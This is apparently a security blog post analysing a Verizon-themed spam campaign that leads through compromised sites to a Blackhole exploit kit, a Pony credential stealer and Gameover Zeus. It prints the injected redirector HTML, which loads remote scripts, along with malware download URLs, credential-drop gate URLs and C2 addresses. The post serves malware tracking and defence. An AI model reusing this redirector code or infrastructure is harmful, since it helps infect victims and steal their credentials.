Your Bill Is Now Available

We saw a return of Verizon Wireless-themed spam today. The sample in question had a subject line of “Your Bill Is Now Available” and was sent from a Cutwail spambot at 86.120.45.80.

This sample had the following malicious links:

casinhajoia.com.br/CvBvr8r9/index.html
coastcruises.com.au/nS9X51yA/index.html
ftp.chirvancontract.gr/K7qjpRQ7/index.html
enil1.home.pl/nS9X51yA/index.html
ftp.bobstudio.com.hk/LgBXz0BV/index.html

These malicious links contained the following html code:

<h1>WAIT PLEASE</h1>
<h3>Loading…</h3>
<script type=”text/javascript” src=”http://colecoesearte.com.br/Kypp5Enk/js.js”></script&gt;
<script type=”text/javascript” src=”http://rafaeltezelli.com.br/G1GCPjut/js.js”></script&gt;

These javascript redirectors in turn bounced victims to a Blackhole Exploit kit at wildestant.com/showthread.php?t=d7ad916d1c0396ff.

Vulnerable victims directed to the above URL at wildestant.com then downloaded a Pony downloader with the following properties:

File: about.exe
Size: 95785
MD5: 14D9C851566E0C66EF67E2C08E6866A7

This Pony downloader posted stolen FTP credentials to http://88.85.99.44:8080/pony/gate.php. The downloader was also configured to communicate with the following backup dropzones in the event the primary at 88.85.99.44 was unavailable. The backup drops were located at:

http://91.121.140.103:8080/pony/gate.php
http://91.121.178.156:8080/pony/gate.php

The Pony downloader was also configured to downloader a Gameover Zeus variant from the following locations:

http://gnarlybuys.info/LMbir.exe
http://karinasadvertising.com/vXFEiixu.exe
http://mancomunidadcentro.org.bo/wN7iM.exe
http://100s.pl/jQnoeUC.exe

This Gameover variant had the following properties:

Size: 262696
MD5: B818C5240F3D45A123F2A497ACA8BEA1

This Gameover variant sent stolen data to drops zones at:

188.230.92.97:15043
93.177.168.141:16115

Web injects were downloaded from 93.177.168.141:16115.

Note, we also observed other blackhole exploit kits at:

184.82.202.46
69.164.199.162

 

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: